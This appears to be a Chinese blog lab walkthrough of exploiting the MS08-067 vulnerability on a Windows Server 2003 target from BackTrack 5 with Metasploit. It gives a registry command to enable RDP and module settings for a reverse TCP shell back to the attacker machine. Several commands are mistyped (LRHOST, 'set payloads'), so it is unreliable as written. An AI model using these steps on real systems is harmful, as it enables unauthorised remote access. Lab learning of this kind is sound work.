靶机：Win2k3    10.10.10.130

攻击机：BT5      10.10.10.128

一：nmap 查看WinK3是否开放端口3389

　开放3389方法：我的电脑->属性->远程

　　命令行方式开启3389端口（任意端口）：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

二、攻击阶段

　　1、查找ms08_067漏洞模块

　　2、调用08_067_netapi渗透模块

　　3、查看此渗透模块所对应的攻击载荷

　　4、查看设置参数并进行设置所需要的参数

set payloads generic/shell_reverse_tcp  #设置所需模块

set options #查看模块所需的设置的参数

set RHOST 10.10.10.130 #设置目标主机

set LRHOST 10.10.10.128 #设置本机

set LPORT 5000  #设置攻击机与靶机连接的端口

show targets

set target 7  #通过show targets 可以查看漏洞所支持windows版本，并设置目标主机所对应的版本序号

5、开始攻击

可以看到已经在win2k3的C盘目录下了

最新文章

1. ajax加载模块实时刷新的原理
2. C#如何读写和创建INI文件
3. Hadoop2.0安装
4. Python每日一练(1):计算文件夹内各个文章中出现次数最多的单词
5. DOM遍历 - 过滤
6. centos + nginx + php-fpm +mysql的简单配置
7. 【HDU - 4349】Xiao Ming's Hope
8. DK location not found. Define location with sdk.dir in the local.properties file or with an ANDROID_HOME
9. MySQL的安装流程与入门
10. Liferay开发人员培训计划
11. JS的prototype和__proto__（含es6的class）
12. 深究CSS中Position的属性和特性
13. matlab作图 latex插图
14. bzoj千题计划169：bzoj2463: [中山市选2009]谁能赢呢？
15. 把MacBook里的电影导入到iPad
16. PHP（十二）文件操作
17. 【Oracle】Update方法
18. codeforce diversity
19. react : code splitting
20. 微软的深度学习框架cntk ，我目前见过 安装方式最简单的一个框架，2.0之后开始支持C# 咯

热门文章

1. css 01-CSS属性：字体属性和文本属性
2. centos8中的MySQL卸载和安装
3. WPF 中的相关样式
4. SpringBoot整合任务调度框架Quartz及持久化配置
5. Idea创建Maven项目时，没有自动添加Artifacts
6. OpenSUSE 使用基础
7. 一文讲尽门面日志slf4j和log4j、log4j2、logback依赖jar引用关系
8. linux脚本错误: line *: [: missing `]'，linux编写shell脚本时的注意点
9. WPF APP 启动时增加特殊逻辑
10. Docker-Compose练习